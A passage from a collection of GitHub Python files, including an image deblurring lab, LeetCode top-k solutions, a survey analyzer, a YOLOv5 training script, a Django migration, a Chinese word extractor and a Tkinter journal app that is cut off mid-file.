1024\n\nimage_spectrum = scipy.fft.fft2(gray_pixels, (nFFT, nFFT))\nfilter_spectrum = scipy.fft.fft2(my_filter, (nFFT, nFFT))\n\nmodified_image_spectrum = image_spectrum * filter_spectrum\nmodified_image = scipy.fft.ifft2(modified_image_spectrum)\nmodified_image = np.real(modified_image)[nFilter:nRows + nFilter, nFilter:nCols + nFilter]\n\n# --------------------------------------------------- reconstruct the image --------------------------------------------\n\nK = 0.02\nH_star = np.conj(filter_spectrum)\nF_hat = (H_star * image_spectrum) / (np.abs(filter_spectrum)**2 + K)\n\nreconstructed_image = np.real(scipy.fft.ifft2(F_hat))\nreconstructed_image = reconstructed_image[:gray_pixels.shape[0], :gray_pixels.shape[1]] # Crop to original size\n\n# --------------------------------------------------------- display images ---------------------------------------------\nfig = plt.figure(1)\nplt.subplot(2, 2, 1)\nplt.title('Original Image')\nplt.imshow(gray_pixels, cmap='gray')\n\nplt.subplot(2, 2, 2)\nplt.title('Motion Blur Filter')\nplt.imshow(my_filter, cmap='gray')\n\nplt.subplot(2, 2, 3)\nplt.title('Modified Image')\nplt.imshow(modified_image, cmap='gray')\n\nplt.subplot(2, 2, 4)\nplt.title('Reconstructed Image')\nplt.imshow(reconstructed_image, cmap='gray')\n\nplt.show()\n","repo_name":"cgurtner/ZHAW-DIP","sub_path":"Lab04/exercise_2_setup.py","file_name":"exercise_2_setup.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10898461068","text":"# Leetcode 347\n\nfrom collections import Counter\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n \n if k == len(nums):\n return nums\n hashmap = Counter(nums) # Counter will create a hashmap based on frequency of numbers\n return heapq.nlargest(k,hashmap.keys(),hashmap.get) #output the k largest numbers based on their freq\n \n # Time = O(nlogk), if k < n to build the heap\n # Space = O(n+k), for hashmap and heap of k elements\n\n################################ USING QUICK SELECT ###############################################################\n \nfrom collections import Counter\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n if k == len(nums):\n return nums\n \n hashmap = {}\n for ele in nums:\n hashmap[ele] = 1 + hashmap.get(ele,0)\n keys = list(hashmap.keys())\n return self.quick_select(keys,0,len(keys)-1,k,hashmap)\n \n def quick_select(self,input,start,end,k,hashmap):\n if k == len(input):\n return input\n if start == end:\n return input[end:]\n pivot_index = self.partition(input,start,end,hashmap)\n # print(pivot_index, input)\n k_index = len(input)-k\n if k_index > pivot_index:\n return self.quick_select(input,pivot_index+1,end,k,hashmap)\n elif k_index < pivot_index:\n return self.quick_select(input,start,pivot_index-1,k,hashmap)\n else:\n return input[pivot_index:]\n \n \n def partition(self,input,start,end,hashmap):\n current = start\n insert_index = start - 1\n pivot_index = end\n \n while current < pivot_index:\n if hashmap[input[current]] < hashmap[input[pivot_index]]:\n insert_index += 1\n input[current],input[insert_index] = input[insert_index],input[current]\n current += 1\n insert_index += 1\n input[pivot_index],input[insert_index] = input[insert_index],input[pivot_index]\n return insert_index\n \n \n # Time = O(n) for quickselect, O(n^2) for worst case\n # Space = O(n) for hashmap and array of unique elements\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"Sorting/TopKFrequency.py","file_name":"TopKFrequency.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14040558501","text":"from OutputWriter import OutputWriter\nfrom project_source import ProjectSource\nfrom comparison import Comparison\nfrom GeneralAnalyzer import GeneralAnalyzer\n\nclass ProjectSourceAnalyzer:\n def __init__(self):\n pass\n\n @staticmethod\n def analyzeEachSourceType(participants, question):\n\n for i in range(3):\n projectSource = ProjectSource(i+1)\n\n percentages = ProjectSourceAnalyzer.getResponsePercentages(participants, question, projectSource)\n OutputWriter.outputPercentages(percentages, question, \"percentage_results_%s.csv\" % str(projectSource))\n\n means = ProjectSourceAnalyzer.getResponseMeans(participants, question, projectSource)\n OutputWriter.outputMeans(means, question, \"mean_results_%s.csv\" % str(projectSource))\n\n\n @staticmethod\n def analyzeSourceTypeDifferencesPercentage(participants, question):\n #Eew, clean it up\n comparisons = []\n \n for i in range(3):\n projectSource1 = ProjectSource(i+1)\n\n for j in range(3):\n projectSource2 = ProjectSource(j+1)\n\n comparison = ProjectSourceAnalyzer.compareProjectSourcePercentages(projectSource1, projectSource2, participants, question)\n comparisons.append(comparison)\n\n return comparisons\n\n @staticmethod\n def analyzeSourceTypeDifferencesMeans(participants, question):\n #Eew, clean it up\n comparisons = []\n \n for i in range(3):\n projectSource1 = ProjectSource(i+1)\n\n for j in range(3):\n projectSource2 = ProjectSource(j+1)\n\n comparison = ProjectSourceAnalyzer.compareProjectSourceMeans(projectSource1, projectSource2, participants, question)\n comparisons.append(comparison)\n\n return comparisons\n\n @staticmethod\n def analyzeGeneralResults(participants, question):\n percentages = ProjectSourceAnalyzer.getResponsePercentages(participants, question)\n OutputWriter.outputPercentages(percentages, question, \"percentage_results.csv\")\n\n means = ProjectSourceAnalyzer.getResponseMeans(participants, question)\n OutputWriter.outputMeans(means, question, \"mean_results.csv\")\n\n @staticmethod\n def getResponsePercentages(participants, question, projectSource=None):\n counts = ProjectSourceAnalyzer.getResponseCounts(participants, question, projectSource)\n\n totals = [sum(dictionary.values()) for dictionary in counts]\n percentageResult = []\n percentDict = {}\n for i in range(len(counts)):\n percentDict = {}\n dictionary = counts[i]\n for key in dictionary.keys():\n percentDict[key] = (float(dictionary[key])/totals[i])*100\n percentageResult.append(percentDict)\n\n return percentageResult\n\n @staticmethod\n def getResponseMeans(participants, question, projectSource=None):\n counts = ProjectSourceAnalyzer.getResponseCounts(participants, question, projectSource)\n\n totals = [sum(dictionary.values()) for dictionary in counts]\n meanResults = []\n for i in range(len(counts)):\n dictionary = counts[i]\n sum_ = sum([int(key)*dictionary[key] for key in dictionary.keys()])\n meanResults.append(float(sum_)/totals[i])\n\n return meanResults\n\n @staticmethod\n def getResponseCounts(participants, question, projectSource=None):\n # print(experience)\n\n if projectSource is not None:\n participants = [p for p in participants if p.projectSource == projectSource]\n\n scoreSums = []\n for x in range(len(question.subquestions)):\n scoreSums.append(GeneralAnalyzer._blankAnswerDict(question))\n \n for participant in participants:\n questionList = getattr(participant, question.name).listed\n\n # print(questionList)\n\n for i in range(len(questionList)):\n currentValue = questionList[i]\n if currentValue is not None:\n scoreSums[i][questionList[i]] += 1\n\n\n return scoreSums\n\n @staticmethod \n def rankComparisons(comparisonList):\n subquestions = []\n for comparison in comparisonList:\n subquestions += comparison.splitSubquestions()\n\n subquestions.sort(key=lambda x: x.value, reverse=True)\n\n return subquestions\n\n @staticmethod \n def compareProjectSourcePercentages(projectSource1, projectSource2, participants, question):\n ps1Result = ProjectSourceAnalyzer.getResponsePercentages(participants, question, projectSource1)\n ps2Result = ProjectSourceAnalyzer.getResponsePercentages(participants, question, projectSource2)\n\n comparison = GeneralAnalyzer.compareDictResults(ps1Result, ps2Result)\n\n return Comparison(projectSource1, projectSource2, question, comparison)\n\n @staticmethod \n def compareProjectSourceMeans(projectSource1, projectSource2, participants, question):\n ps1Result = ProjectSourceAnalyzer.getResponseMeans(participants, question, projectSource1)\n ps2Result = ProjectSourceAnalyzer.getResponseMeans(participants, question, projectSource2)\n\n comparison = GeneralAnalyzer.compareListResults(ps1Result, ps2Result)\n\n return Comparison(projectSource1, projectSource2, question, comparison)","repo_name":"mckeesh/SurveyAnalysis","sub_path":"ProjectSourceAnalyzer.py","file_name":"ProjectSourceAnalyzer.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10675841939","text":"from utils.pascal_dataset import *\nfrom model.model import *\nfrom utils.loss import *\nimport config\n\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\n\nfrom tqdm import tqdm\n\n\nif __name__ == '__main__':\n model = YOLOv5(torch.tensor(config.ANCHORS),\n len(config.PASCAL_CLASSES),\n depth_multiple=config.DEPTH_MULTIPLE,\n width_multiple=config.WIDTH_MULTIPLE).to(config.DEVICE)\n model.train()\n optimizer = optim.Adam(model.parameters(), lr=config.LR, weight_decay=config.WEIGHT_DECAY)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n 'min',\n config.LR_SCHEDULER_FACTOR,\n config.LR_SCHEDULER_PATIENCE,\n config.LR_SCHEDULER_THRESHOLD)\n if config.LOAD_MODEL:\n checkpoint = torch.load(config.LOAD_PATH, map_location=config.DEVICE)\n model.load_state_dict(checkpoint[\"model\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n scaler = torch.cuda.amp.GradScaler()\n anchors = torch.tensor(config.ANCHORS) / config.IMAGE_SIZE\n dataset = PascalDataset(config.IMG_DIR,\n config.LABEl_PATH,\n classes=config.PASCAL_CLASSES,\n sizes=config.OUTPUT_SIZES,\n anchors = anchors,\n transform=config.train_transforms, )\n train_loader = DataLoader(dataset=dataset, batch_size=config.BATCH_SIZE, shuffle=True)\n scaled_anchors = (anchors * torch.tensor(config.OUTPUT_SIZES).unsqueeze(1).unsqueeze(1).repeat(1, 3, 2)).to(\n config.DEVICE)\n criterion = YoloLoss(scaled_anchors,\n len(config.PASCAL_CLASSES),\n config.LAMBDA_NOOBJ,\n config.LAMBDA_OBJ,\n config.LAMBDA_BOX,\n config.LAMBDA_CLS)\n for epoch in range(config.N_EPOCHS):\n loader_tqdm = tqdm(train_loader)\n losses = []\n for x, y in loader_tqdm:\n x = x.to(config.DEVICE)\n anchors = anchors.to(config.DEVICE)\n with torch.cuda.amp.autocast():\n output = model(x)\n loss = criterion(output, y)\n optimizer.zero_grad()\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n losses.append(loss.item())\n lr = optimizer.param_groups[0][\"lr\"]\n mean_loss = sum(losses) / len(losses)\n loader_tqdm.set_postfix(mean_epoch_loss=mean_loss, lr=lr)\n mean_loss = sum(losses) / len(losses)\n scheduler.step(mean_loss)\n if config.SAVE_MODEL:\n torch.save(\n {\n \"model\": model.state_dict(),\n \"optimizer\": optimizer.state_dict()\n },\n config.SAVE_PATH)\n print('CHECKPOINT SAVED')\n","repo_name":"vladislav-shevchenko/simple-pytorch-yolov5","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70016156327","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport acceso.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('radicado', '0001_initial'),\n ('gestor', '0007_auto_20150901_1503'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Actividad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('titulo', models.CharField(max_length=200)),\n ('descripcion', models.TextField(max_length=2000)),\n ],\n ),\n migrations.CreateModel(\n name='Ciclo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Componente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Corte',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('titulo', models.CharField(max_length=100)),\n ('descripcion', models.TextField(max_length=5000)),\n ],\n ),\n migrations.CreateModel(\n name='Encargado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('encargado', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Entregables',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('entregables', models.CharField(max_length=1000)),\n ],\n ),\n migrations.CreateModel(\n name='Evidencia',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('soporte', models.FileField(upload_to=acceso.models.content_file_name, blank=True)),\n ('actividad', models.ForeignKey(to='acceso.Actividad')),\n ('ciclo', models.ForeignKey(to='acceso.Ciclo')),\n ('componente', models.ForeignKey(to='acceso.Componente')),\n ('corte', models.ForeignKey(blank=True, to='acceso.Corte', null=True)),\n ('encargado', models.ForeignKey(to='acceso.Encargado')),\n ('gestor', models.ForeignKey(to='gestor.Gestor')),\n ],\n ),\n migrations.CreateModel(\n name='Modulo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('descripcion', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Valor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('valor', models.BigIntegerField()),\n ],\n ),\n migrations.AddField(\n model_name='evidencia',\n name='modulo',\n field=models.ForeignKey(to='acceso.Modulo'),\n ),\n migrations.AddField(\n model_name='evidencia',\n name='radicado',\n field=models.ForeignKey(to='radicado.Radicado'),\n ),\n migrations.AddField(\n model_name='evidencia',\n name='valor',\n field=models.ForeignKey(to='acceso.Valor'),\n ),\n ]\n","repo_name":"Dandresfsoto/Andes","sub_path":"acceso/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34379371532","text":"import os, sys, csv\n\nimport datafetch\nfrom segmenterhelper import SegmenterHelper, RachelsCategories\nfrom config import Config\n\nNUM_NEW_WORDS_PER_RUN = 20\nINPUT_FILE_PATH = os.path.expanduser(\"/tmp/corpus.txt\")\nOUTPUT_FILE_PATH = os.path.expanduser(\"~/Desktop/out.tsv\")\nCONFIG_FILE_PATH = \"config.db\"\n\ndef dedupe_and_dump_results(segHelper):\n try:\n all_words = set()\n\n if os.path.exists(OUTPUT_FILE_PATH):\n print (\"Found existing wordlist file, reading list...\")\n with open(OUTPUT_FILE_PATH, 'r+') as tsvfile:\n reader = csv.DictReader(tsvfile, dialect='excel-tab')\n for row in reader:\n all_words.add(row[\"original_word\"])\n\n with open(OUTPUT_FILE_PATH, 'a+') as tsvfile:\n if len(all_words) == 0:\n print (\"Starting new word list file...\")\n tsvfile.write(RachelsCategories.csv_header)\n\n new_words = []\n\n print(\"Deduping wordlists, writing to file...\")\n for word in segHelper.results:\n if word.orig_word not in all_words:\n new_words.append(word)\n\n if len(new_words) == NUM_NEW_WORDS_PER_RUN:\n break\n\n tsvfile.write(\"\\n\")\n results = '\\n'.join([str(x) for x in new_words])\n tsvfile.write(results)\n except (OSError, IOError) as e:\n print(\"Warning: Failed to write to output file {}: {}\".format(OUTPUT_FILE_PATH, e))\n \ndef main():\n # Fetch Chinese text and write to input file\n print(\"NYT Chinese Word Extractor\\nBy Ephraim Kunz\\n\\n\")\n\n print(\"Fetching text from cn.nytimes.com...\")\n text = datafetch.get_concatenated_text()\n\n print(\"Writing fetched text to temporary file...\")\n with open(INPUT_FILE_PATH, 'w+') as input_file:\n input_file.write(text)\n\n # Build SegmenterHelper\n print(\"Loading configurations, dictionaries, wordlists...\")\n runningDir=os.path.dirname(os.path.abspath(__file__))\n segHelper = SegmenterHelper(runningDir)\n\n # Run the segmenter\n config = Config(str(os.path.abspath(CONFIG_FILE_PATH)))\n config.appDir = segHelper.runningDir\n\n segHelper.config = config\n segHelper.LoadData()\n segHelper.LoadKnownWords()\n segHelper.LoadExtraColumns()\n\n print(\"Reading fetched text from temporary file...\")\n segHelper.ReadFiles( [INPUT_FILE_PATH])\n\n segHelper.SummarizeResults()\n\n print(\"\\n\")\n print(segHelper.summary)\n\n # Dedup words and write new output file\n print(\"Deduping results and dumping new wordlist file...\")\n dedupe_and_dump_results(segHelper)\n\n print(\"Done! Output file written to {}\".format(OUTPUT_FILE_PATH))\n\n input(\"Press enter to exit...\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"ephraimkunz/NYTChinese","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37972243026","text":"from django import forms\n\nfrom .models import AlgoTask\n\n\nclass TaskForm(forms.ModelForm):\n class Meta:\n model = AlgoTask\n fields = [\"a\", \"h\", \"r\", \"m\"]\n\n labels = {\n \"a\": \"Сторона куба\",\n \"h\": \"Высота цилиндра\",\n \"r\": \"Радиус основания цилиндра\",\n \"m\": \"Объем жидкости\",\n }\n","repo_name":"yulachi/cats-fun-site","sub_path":"algo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9662922478","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 20 15:00:50 2016\n\n@author: Kozmik\n\"\"\"\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport tkinter.messagebox as messagebox\nfrom JObject import JEntry\nfrom BodyModule import BodyFrame\nfrom TagsModule import TagsFrame\nfrom Storage import Storage\nfrom DateModule import DateFrame\nfrom os.path import join\nfrom GraphTools import JGraph\nfrom AttachmentTools import AttachmentManager\n\n\nclass Main(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n style = JournalStyle()\n style.setNightStyle()\n self.attributes('-fullscreen', False)\n self.args = style.getCustomValues()\n w, h = self.winfo_screenwidth(), self.winfo_screenheight()\n self.geometry(\"%dx%d+0+0\" % (w*0.995, h*.87))\n self.config(bg=self.args['bgcolor1'])\n# self.overrideredirect(1)\n self.title('kunnekted-jurnl')\n\n self.storage = Storage()\n self.args['homepath'] = self.storage.getPath()\n iconpath = join(self.args['homepath'], 'Resources\\\\web.ico')\n self.iconbitmap(iconpath)\n messagepath = (join(self.args['homepath'], 'Resources\\\\Messages'))\n messagefile = open(messagepath)\n self.messages = messagefile.read()\n self.journal = self.storage.getJournal()\n self.entry = JEntry()\n \n self.backup_interval_var = self.storage.getBackupIntervalVar()\n self.journal_auto_save = self.storage.getAutosaveVar()\n self.last_backup_var = self.storage.getLastBackupVar()\n self.fullscreen_var = self.storage.get_fullscreen_var()\n\n self.short_message_var = tk.StringVar(name='Message', value='')\n \n \"\"\"Frame 1\"\"\"\n frame1 = ttk.Frame(self)\n frame1_1 = ttk.Frame(frame1)\n self.date_frame = DateFrame(frame1_1, self.entry, self.journal, \n self, width=100, **self.args)\n frame1_3 = ttk.Frame(frame1)\n self.LAST_BACKUP_LABEL = ttk.Label(frame1_3, text='Last Backup: ')\n self.LAST_BACKUP = ttk.Label(frame1_3, \n textvariable=self.last_backup_var)\n self.MESSAGE = ttk.Label(frame1_3, textvariable=self.short_message_var)\n # self.LAST_BACKUP.pack(side='right', padx=3)\n # self.LAST_BACKUP_LABEL.pack(side='right')\n # self.MESSAGE.pack(side='bottom')\n self.LAST_BACKUP.grid(row=0, column=1)\n self.LAST_BACKUP_LABEL.grid(row=0, column=0)\n self.MESSAGE.grid(row=1, column=1, sticky='se')\n frame1_1.grid(row=0, column=0, sticky='w')\n self.date_frame.grid(row=1, column=0, padx=self.args['padx'], sticky='w')\n frame1_3.grid(row=0, column=2)\n frame1.grid_columnconfigure(0, weight=1)\n frame1.grid_columnconfigure(1, weight=2)\n frame1.grid_columnconfigure(2, weight=0)\n frame1.pack(side='top', expand=True, fill='x', padx=self.args['padx'])\n \n \"\"\"Frame 2\"\"\"\n frame2 = ttk.Frame(self)\n self.body_frame = BodyFrame(frame2, self.entry, **self.args)\n self.tags_frame = TagsFrame(frame2, self.journal, self.entry, **self.args)\n self.body_frame.pack(side='top', expand=True, fill='both', \n padx=self.args['padx'], pady=self.args['pady'])\n self.tags_frame.pack(side='top', expand=True, fill='x', \n padx=self.args['padx'], pady=self.args['pady'])\n frame2.pack(side='top', expand=True, fill='x', padx=self.args['padx'], \n pady=self.args['pady'])\n \n \"\"\"Frame 3\"\"\"\n frame3 = ttk.Frame(self)\n frame3_1 = ttk.Frame(frame3)\n self.options_frame = ttk.Frame(frame3, relief=self.args['relief'], \n border=self.args['border'])\n frame3_3 = ttk.Frame(frame3)\n self.jgraph = JGraph(self.options_frame, self, self.journal, \n self.entry, **self.args)\n self.attachmanager = AttachmentManager(self.options_frame, self, self.journal, \n self.entry, **self.args) \n frame3_1.pack(side='left', expand=True, fill='x')\n self.options_frame.pack(side='left', pady=self.args['pady'])\n frame3_3.pack(side='left', expand=True, fill='x')\n frame3.pack(side='top', expand=True, fill='x', padx=self.args['padx'])\n self.SAVE = ttk.Button(self.options_frame, takefocus=0, text=\"Save\", \n command=self.save)\n self.SAVE.grid(row=0, column=0)\n self.NEW = ttk.Button(self.options_frame, takefocus=0, text=\"New Entry\", \n command=self.newEntry)\n self.NEW.grid(row=0, column=6)\n self.QUIT = ttk.Button(self.options_frame, takefocus=0, text=\"Quit\", \n command=self.destroyApp)\n self.QUIT.grid(row=1, column=0)\n self.DELETE = ttk.Button(self.options_frame, takefocus=0, text=\"Delete\", \n command=self.delete)\n self.DELETE.grid(row=1, column=6)\n self.jgraph.grid(row=0, column=2, rowspan=2)\n self.attachmanager.grid(row=0, column=4, rowspan=2)\n \n \"\"\"Menu\"\"\"\n menubutton = ttk.Menubutton(frame1_1, text='Options')\n menubar = tk.Menu(menubutton, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n menubutton.config(menu=menubar)\n \n journal_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0)\n journal_menu.add_command(label='Save All Changes', \n command=self.writeToDatabase)\n app_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0)\n# app_pref_menu = tk.Menu(app_menu, bg=self.args['bgcolor1'], \n# fg=self.args['textcolor1'], tearoff=0)\n theme_menu = tk.Menu(app_menu, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0)\n theme_menu.add_command(label='Light Theme (WIP)', command=style.setDayStyle)\n theme_menu.add_command(label='Dark Theme', command=style.setNightStyle)\n# app_menu.add_cascade(label='App Preferences', menu=app_pref_menu)\n app_menu.add_cascade(label='Theme', menu=theme_menu)\n app_menu.add_command(label='Toggle Fullscreen', command=self.toggle_full_screen)\n pref_menu = tk.Menu(journal_menu, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n journal_menu.add_cascade(label='Database Preferences', menu=pref_menu)\n \n entry_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n entry_menu.add_command(label='Save', command=self.save)\n entry_menu.add_command(label='Delete', command=self.delete)\n pref_menu.add_command(label=\"Change Save Directory\", \n command=self.storage.changeSaveDirectory)\n backup_menu = tk.Menu(pref_menu, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n backup_menu.add_command(label='Change Backup Directory', \n command=self.storage.changeBackupDirectory)\n self.interval_menu = tk.Menu(backup_menu, bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'], tearoff=0, \n selectcolor=self.args['arrow'])\n self.interval_menu.add_command(label='Immediately', \n command=self.storage.backupDatabase)\n self.interval_menu.add_radiobutton(label='Day', \n var=self.backup_interval_var, \n value=24, \n command=self.storage.changeBackupSchedule)\n self.interval_menu.add_radiobutton(label='3 Days', \n var=self.backup_interval_var, \n value=72, \n command=self.storage.changeBackupSchedule)\n self.interval_menu.add_radiobutton(label='Week', \n var=self.backup_interval_var, \n value=168, \n command=self.storage.changeBackupSchedule)\n self.interval_menu.add_radiobutton(label='Never', \n var=self.backup_interval_var, \n value=-1, \n command=self.storage.changeBackupSchedule)\n\n backup_menu.add_cascade(label='Backup Database Every...', \n menu=self.interval_menu)\n pref_menu.add_cascade(label='Backup Options', menu=backup_menu)\n pref_menu.add_command(label=\"Change Imports Directory\", \n command=self.storage.changeImportsDirectory)\n\n help_menu = tk.Menu(menubar, bg=self.args['bgcolor1'], fg=self.args['textcolor1'], \n tearoff=0, selectcolor=self.args['arrow'])\n help_menu.add_command(label='Help', command=self.createHelpWindow)\n help_menu.add_command(label='Keyboard Shortcuts', \n command=self.createShortcutsWindow)\n help_menu.add_command(label=\"About\", command=self.createAboutWindow)\n \n menubar.add_cascade(label='App', menu=app_menu)\n menubar.add_cascade(label='Journal', menu=journal_menu)\n menubar.add_cascade(label=\"Entry\", menu=entry_menu)\n menubar.add_cascade(label=\"Help\", menu=help_menu)\n menubar.add_command(label='Quit', command=self.destroyApp)\n self.config(menu=menubutton)\n menubar.config(bg=self.args['bgcolor1'], fg=self.args['textcolor1'])\n menubutton.grid(row=0, column=0, sticky='w', pady=self.args['pady'])\n \n self.protocol(\"WM_DELETE_WINDOW\", self.destroyApp)\n self.bindDateControl()\n self.updateGUI(entry=self.entry)\n if self.storage.getFirstTimeVar().get():\n self.createWelcomeWindow()\n self.storage.changeFirstTimeFlag()\n if self.fullscreen_var.get():\n self.attributes('-fullscreen', True)\n \n def createWelcomeWindow(self):\n self.createWindow('Welcome!', self.messages.split('')[1], \n (500, 500))\n \n def createShortcutsWindow(self):\n self.createWindow('Shortcuts', self.messages.split('')[1], \n (500, 500))\n \n def createHelpWindow(self):\n self.createWindow('Help', self.messages.split('')[1], (300, 500))\n \n def createAboutWindow(self):\n self.createWindow('About', self.messages.split('')[1], \n (200, 300))\n \n def createWindow(self, title, message, dims):\n main = tk.Toplevel(bg=self.args['bgcolor1'])\n main.title(title)\n main.iconbitmap(join(self.args['homepath'], 'Resources\\web.ico'))\n outerframe = ttk.Frame(main)\n frame = ttk.Frame(outerframe)\n ybar = ttk.Scrollbar(frame)\n text=tk.Text(frame, yscrollcommand=ybar.set, \n wrap='word', font='TkMenuFont', bg=self.args['bgcolor1'], \n fg=self.args['textcolor1'])\n ybar.config(command=text.yview)\n text.insert('insert', message)\n text.config(state='disabled')\n text.pack(side='left', fill='both', expand=True)\n ybar.pack(side='left', fill='y', expand=False, anchor='w')\n frame.pack(side='left', fill='both', expand=True, anchor='e', padx=3)\n outerframe.pack(expand=True, fill='both')\n main.focus_force()\n main.grab_set()\n \n def destroyApp(self):\n if self.entry.getDate() or not self.body_frame.bodyFieldIsEmpty():\n self.save()\n self.attachmanager.clean()\n self.storage.saveJournal(self.journal)\n self.storage.save_ini_file()\n self.destroy()\n\n def toggle_full_screen(self):\n v = self.attributes('-fullscreen')\n if v:\n v = False\n else:\n v = True\n self.attributes('-fullscreen', v)\n self.storage.change_fullscreen_flag(v)\n\n def changeAutoSavePref(self):\n self.storage.toggleAutoSave()\n if self.journal_auto_save.get():\n message = 'Journal autosave is ON.'\n else:\n message = 'Journal autosave is OFF'\n messagebox.showinfo(title='Autosave', message=message)\n \n def updateGUI(self, event=None, entry=None):\n if not self.body_frame.bodyFieldIsEmpty(): # and not self.date_frame.getDate():\n self.save()\n date = self.date_frame.indexDate()\n if entry:\n self.entry = entry\n elif date:\n self.entry = self.journal.getEntry(date)\n else:\n self.entry = JEntry()\n self.date_frame.updateGUI(self.entry)\n self.body_frame.updateGUI(self.entry)\n self.tags_frame.updateGUI(self.entry)\n self.attachmanager.updateGUI(self.entry)\n self.jgraph.updateGUI(self.entry)\n self.body_frame.grabFocus()\n \n def clearGUI(self):\n self.entry = JEntry()\n self.date_frame.clearGUI(self.entry)\n self.body_frame.clearGUI(self.entry)\n self.tags_frame.clearGUI(self.entry)\n self.attachmanager.clearGUI(self.entry)\n self.jgraph.clearGUI(self.entry)\n self.body_frame.grabFocus()\n\n def clear_short_message(self):\n self.short_message_var.set('')\n \n def bindDateControl(self):\n self.date_frame.bindDatebox(self.updateGUI)\n \n def save(self):\n self.date_frame.save()\n self.body_frame.save()\n self.tags_frame.save()\n self.attachmanager.save()\n if self.entry.getParent():\n date = self.entry.getParent()\n parent = self.journal.getEntry(date)\n parent.linkChild(self.entry.getDate())\n self.jgraph.updateGUI(self.entry)\n self.journal.add(self.entry)\n self.short_message_var.set('Saved')\n self.after(3500, self.clear_short_message)\n \n def writeToDatabase(self):\n self.save()\n self.storage.saveJournal(self.journal)\n \n def delete(self):\n date = self.entry.getDate()\n if not date:\n self.clearGUI()\n else:\n selection = messagebox.askyesno(\"Delete Entry\", \"Delete this entry?\")\n if selection:\n self.jgraph.deleteEntry(self.entry.getDate())\n self.journal.delete(self.entry)\n self.attachmanager.delete()\n self.clearGUI()\n \n def newEntry(self):\n if self.entry.getDate() or not self.body_frame.bodyFieldIsEmpty():\n self.save()\n self.updateGUI(entry=JEntry())\n \n def newLink(self):\n if self.entry.getDate() or not self.body_frame.bodyFieldIsEmpty():\n self.save()\n self.updateGUI(entry=JEntry(parent=self.entry.getDate(), \n tags=self.entry.getTags()))\n \nclass JournalStyle(ttk.Style):\n def __init__(self):\n ttk.Style.__init__(self)\n self.tk_widgets = []\n self.bgcolor1 = None\n self.bgcolor2 = None\n self.text_color1 = None\n self.text_color2 = None\n self.text_color3 = None\n self.frame_borderwidth = 4\n self.padx = 5\n self.pady = 3\n self.frame_relief = 'groove'\n self.theme_create('shadow', parent='default')\n 